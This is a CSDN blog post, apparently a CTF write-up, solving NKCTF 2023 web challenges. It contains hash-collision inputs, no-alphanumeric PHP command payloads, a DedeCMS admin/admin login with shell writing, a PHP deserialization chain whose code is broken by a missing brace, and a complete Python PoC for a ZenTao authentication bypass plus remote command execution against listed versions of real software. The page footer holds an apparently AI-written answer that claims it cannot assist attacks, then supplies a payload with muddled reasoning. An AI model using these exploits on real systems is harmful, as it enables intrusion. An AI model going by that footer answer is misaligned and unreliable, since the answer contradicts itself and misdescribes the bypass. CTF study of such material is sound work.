2023NKCTF----web

最新推荐文章于 2024-07-24 23:00:08 发布
最新推荐文章于 2024-07-24 23:00:08 发布
阅读量489 收藏
点赞数 2
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51233573/article/details/130693449
版权

EZPHP

 

一个一个慢慢绕过

第一层  MD5弱比较

参数a和b选其中一个进行绕过

QNKCDZO

240610708

s878926199a

s155964671a

第二层   sha1绕过

用两个sha1相同的值进行绕过(注意这里不能用burp)

c=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1&d=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

第三层  intval     参考这个用114514.01进行绕过

第四层   NS_CTF.go  

对这个参数进行传参要注意的是  不能又_   用[代替

最后一层过滤掉了所有的可见字符   

参考这篇文章 构造无数字字符的命令

无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_无字母数字异或运算绕过_yu22x的博客-CSDN博客

找一个在线运行php的

<?php

$a=urlencode(~('system'));

$b=urlencode(~('cat /flag'));

echo $a;

echo "\n";

echo $b;

?>

 

传参:cmd=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);

得到最后的flag

 PMS

禅道nady  上exp

# -*- coding: UTF-8 -*-
# !/usr/bin/python

'''
权限绕过+RCE POC 伪静态传参版
禅道系统 影响版本 安全版本
开源版 17.4以下的未知版本<=version<=18.0.beta1 18.0.beta2
旗舰版 3.4以下的未知版本<=version<=4.0.beta1 4.0.beta2
企业版 7.4以下的未知版本<=version<=8.0.beta1 8.0.beta2
'''
import requests

proxies = {
    # "http": "127.0.0.1:8080",
    # "https": "127.0.0.1:8080",
}


def check(url):
    url1 = url + '/misc-captcha-user.html'
    # url1 = url+'/index.php?m=misc&f=captcha&sessionVar=user'#非伪静态版本按照此格式传参
    # url2 = url+'/index.php?m=block&f=printBlock&id=1&module=my'#可判断验证绕过的链接
    url3 = url + 'repo-create.html'
    url4 = url + 'repo-edit-10000-10000.html'
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
    }

    headers2 = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36",
        "Accept-Language": "zh-CN,zh;q=0.9",
        "Cookie": "zentaosid=u6vl6rc62jiqof4g5jtle6pft2; lang=zh-cn; device=desktop; theme=default",
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": url + "/repo-edit-1-0.html"
    }

    data1 = 'product%5B%5D=1&SCM=Gitlab&name=66666&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid='
    data2 = 'SCM=Subversion&client=`tac /flag`'
    s = requests.session()
    try:
        req1 = s.get(url1, proxies=proxies, timeout=5, verify=False, headers=headers)
        req3 = s.post(url3, data=data1, proxies=proxies, timeout=5, verify=False, headers=headers2)
        req4 = s.post(url4, data=data2, proxies=proxies, timeout=5, verify=False, headers=headers2)
        if 'uid=' not in req4.text:
            print(url, "")
            print(req4.text)
            return True
    except Exception as e:
        print(e)
    return False


if __name__ == '__main__':
    print(check("http://1a64a76c-8af4-4111-9d02-a29992f2e9d6.node2.yuzhian.com.cn/"))

参考这篇博客

https://blog.csdn.net/qq_41904294/article/details/128838423

Hardphp 


<?php 
// not only ++ 
error_reporting(0); 
highlight_file(__FILE__); 

if (isset($_POST['NKCTF'])) { 
    $NK = $_POST['NKCTF']; 
    if (is_string($NK)) { 
        if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$NK) && strlen($NK) < 105){ 
            eval($NK); 
        }else{ 
            echo("hacker!!!"); 
        } 
    }else{ 
        phpinfo(); 
    } 
} 
?>

Rce绕过  过滤可见字符一堆符合这里~ >都被过滤了只能用自增的方式来进行绕过

尝试了一圈发现都不太行  先phpinfo看看系统禁用了那些函数

构造一个数组让他报错执行phpinfo

过滤了很多函数   其中命令执行函数system被禁用了

再来继续看代码

 

 

过滤了所有的大小写字母和数字  常用的绕过方法取反~  异或^  均被过滤了这里还能采用另外一种方式  自增进行绕过

参考文章:

https://www.q1jun.cn/2023/01/21/9ccea94598fa-q1jun/#0x02-%E9%A2%98%E7%9B%AE%E8%AF%A6%E6%83%85

用readfile  读取flag

构造的payload

NKCTF=%24_%3D(_%2F_._)%5B___%5D%3B%24__%3D%2B%2B%24_%3B%24_____%3D%2B%2B%24_.%24__%3B%2B%2B%24_%2F%2B%2B%24_%3B%24_%3D_.%24_____.%3D%2B%2B%24_.%2B%2B%24_%3B%24%24_%5B___%5D(%24%24_%5B_%5D)%3B&___=readfile&_=/flag

easy_cms 
 

织梦cms默认的后台界面

http://b5b35e86-4cba-4de3-a814-5c4896dd6607.node2.yuzhian.com.cn/dede

弱口令  admin  admin登录进后台

查看模板设置  禁用了很多函数

 

将禁用函数全部删除

利用上传接口上传文件  直接传shell会被waf拦这里用文件写入的方法写入shell

上传文件  

 

访问执行

 

成功写入shell

 

 

baby_php 

构造顺序:

Welcome:: destruct -> Hel10:: tostring-> Happy:: invoke

参考文章:https://www.cnblogs.com/superwinner/p/17260940.html

unserialize  php反序列化

url编码绕过正则检测

pop链

<?php
class Welcome{
        public $name;
        public $arg;
    }
class Happy{
        public $shell;
        public $cmd;

class Hell0{
        public $func;
    }
$welcome = new Welcome();   //实例化对象
$welcome->name = "welcome_to_NKCTF";  //对welcome对象的name进行赋值
$happy = new Happy();
$hello = new Hell0();
$happy->shell = "urldecode";
$happy->cmd = "%73%79%73%74%65%6d%28%27%6c%73%20/%27%29%3b";
$hello->func = $happy;
$welcome->arg = $hello;
echo urlencode(serialize($welcome));
?>

 

爱喝旺仔的旺旺
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
正则表达式 与绕过案例
cao_bo的博客
07-29 500
正则表达式 与绕过案例
2024NKCTF-pwn
03-25
2024NKCTF_pwn
浅谈CTF中各种花式绕过的小trick
ph0ebus的博客
02-23 4175
在代码审计的时候,我们不难发现很多很多的函数需要我们bypass,这些知识点很多又很小,基本上是一眼就明白,但是下一次遇见又不太清晰,需要反反复复查找,这篇文章浅浅做个汇总,如有不足,欢迎补充。
2023NKCTF web题解
m0_62107966的博客
03-26 897
考察php函数漏洞,有md5、sha1、intval、非法参数名NS_CTF.go绕过、无数字字母绕过。第五层 绕无数字字母,使用或绕过即可。要先通过find命令找到flag文件,最后在cat获取即可。第四层是非法参数名NS_CTF.go的解决, 将。首先第一层if要绕md5,用数组即可。第二层是sha1绕过,用碰撞码绕过。第三层是绕intval 使用小数即可。第五层 绕无数字字母,使用或绕过即可。要先通过find命令找到flag文件,最后在cat获取即可。 ("%13%19%13%14成功拿到flag。
2023NKCTF Writeup——W4ntY0u.
weixin_52365980的博客
03-27 4095
NKCTF2023是由N0wayBack战队举办。本次比赛采用线上网络安全技能大赛实践赛的形式,覆盖Web、Reverse、Pwn、Misc、Crypto、SocialEngineering等主流赛题方向,面向国内所有个体及团队 除了梦想外我们一无所有,将会和蔑视与困境做最后的斗争,这是最后一舞
[NKCTF2023]web/misc/blockchain-wp
qq_63923205的博客
03-27 1077
NKCTF WP
NKCTF.md
03-29
NKCTF.md
CTF笔记:PHP函数is_numeric()绕过
qq_46145027的博客
04-30 5324
在做CTF过程中遇到的is_numeric()函数,作用是判断输入是不是数字或数字字符串。 思路1:数值->非数值 原题是[极客大挑战 2019]BuyFlag,判断代码如下: if (is_numeric($password)) { echo "password can't be number</br>"; }elseif ($password == 404) { echo "Password Right!</br>"; } 密码是404,但是不能输入数
[NKCTF2023]web/misc/Social Engineering-WP
qq_43328446的博客
03-27 1321
nkctf2023
NKCTF2023 web wp
adorkablezhenbai的博客
03-27 1103
web新手签到NKCTF,简单记录两个签到题。
NKCTF 2023 Writeup By AheadSec
末初的CSDN博客
03-27 2647
NKCTF 2023 Writeup By AheadSec 战队的各位师傅辛苦啦~
NKCTF-web(记一次越权)
jiyi_guoshu的博客
03-14 2669
这里写自定义目录标题题目如下进入网页,发现是一个登陆框,先注册一个账户点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。尝试注册admin为用户名的账户,网页提示用户名已被注册。 题目如下 进入网页,发现是一个登陆框,先注册一个账户 点击登陆,发现网站返回的是一串字符,并且暗示我们要去注册admin账户。 尝试注册admin为用户名的账户,网页提示用户名已被注册。 ...
NKCTF2023 web部分wp
arcuied
03-27 363
NKCTF2023 web部分wp
ctf 绕过php,浅析CTF绕过字符数字构造shell
weixin_32101285的博客
03-19 5213
原标题:浅析CTF绕过字符数字构造shell12/14本文字数3734前言在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。无字母数字webshell简单来说就是payload中不能出现字母,数字(有些题目还有其他一些过滤),通过异或取反等方法取得flag。本文涉及知识点实操练习-使用base64与deflat...
浅析CTF绕过字符数字构造shell
蚁景网安学院
12-14 3633
在CTF中,虽然有很多文章有这方面的资料,但是相对来说比较零散,这里主要把自己学习和打ctf遇到的一些绕过字符数字构造shell梳理一下。
CTF命令执行及绕过技巧
热门推荐
JBlock的博客
03-07 2万+
前言 今天是代码审计部分的一个技巧补充!前些阵子做了sql注入回顾篇系列!今天开启php代码审计系列! 今天内容主要是CTF中命令注入及绕过的一些技巧!以及构成RCE的一些情景! 文章目录前言正文代码执行代码执行的几种方式命令执行常见命令执行函数绕过姿势敏感字符绕过处理无回显的命令执行Think one Think 正文 在详细介绍命令注入之前,有一点需要注意:命令注入与远程代码执行不同。他们的区...
网站基本布局CSS
m0_46608027的博客
07-24 797
* 滚动条轨道样式 *//* 滚动条样式 *//* 滑块样式 */
ASP.NET Web Api 使用 EF 6,DateTime 字段如何取数据库服务器当前时间
最新发布
yangshuquan的专栏
07-24 787
在做数据库设计时,为了方便进行数据追踪,通常会有几个字段是每个表都有的,比如创建时间、创建人、更新时间、更新人等,这些时间字段一般存储的是数据库服务器的时间,EF 是操作整个数据表对象,所以需要寻找方法来实现这个目的。本文分享 DB First 和 Code First 两种模式的 EF 中 DateTime 字段如何存储数据库服务器当前时间的方法。
<?php error_reporting(0); class Welcome{ public $name; public $arg = 'oww!man!!'; public function __construct(){ $this->name = 'ItS SO CREAZY'; } public function __destruct(){ if($this->name == 'welcome_to_NKCTF'){ echo $this->arg; } } } function waf($string){ if(preg_match('/f|l|a|g|*|?/i', $string)){ die("you are bad"); } } class Happy{ public $shell; public $cmd; public function __invoke(){ $shell = $this->shell; $cmd = $this->cmd; waf($cmd); eval($shell($cmd)); } } class Hell0{ public $func; public function __toString(){ $function = $this->func; $function(); } } if(isset($_GET['p'])){ unserialize($_GET['p']); }else{ highlight_file(FILE); } ?>我应该怎么注入攻击,用于教学
03-26
请注意,我作为AI语言模型不能诱导或者帮助任何形式的攻击行为。以下内容仅用于教学目的。 首先,这段代码中存在一个反序列化漏洞,可以通过构造一个恶意的序列化对象来执行任意代码。因此,首先需要构造一个payload,使用序列化函数将攻击代码序列化并将其作为参数传递给反序列化函数。 在这个例子中,可以通过在反序列化前添加以下内容来伪造一个序列化字符串: O:7:"Welcome":2:{s:4:"name";s:16:"welcome_to_NKCTF";s:3:"arg";s:11:"my_payload";} 这将创建一个Welcome对象,它的名称为“welcome_to_NKCTF”,arg为“my_payload”。 接下来,需要构造一个恶意函数并将其传递给这个对象。由于类名、方法名和参数都被限制了,我们可以选择Happy类中的__invoke()方法。该方法接受一个字符串作为参数,将其传递给被调用的shell函数,然后执行该函数的输出。因此,我们可以将攻击代码作为字符串传递给该函数,并使用反引号(`)将其封装在shell()函数中,以便能够直接执行它。最后,我们需要检查并绕过输入过滤函数waf(),这可以通过传递包含非法字符的字符串来完成,触发die语句并终止程序的执行。 以下是构造的payload: O:7:"Welcome":2:{s:4:"name";s:16:"welcome_to_NKCTF";s:3:"arg";s:71:"$obj = new Hell0(); $obj->func = create_function('', '`{$_GET["cmd"]}`'); echo $obj;";} 这个payload将创建一个Welcome对象,其中arg为一个包含恶意代码的字符串,这里我们创建了一个Hell0对象,将恶意代码作为匿名函数传递给其func属性,并使用echo打印出来。 最后,我们将payload作为参数传递给反序列化函数,访问该页面时将触发攻击代码的执行,从而可以尝试在目标服务器上执行任意命令,窃取敏感数据等攻击行为。 请注意,在真实环境中执行此类攻击是不道德的、非法的、有风险的,本教程仅用于学术目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值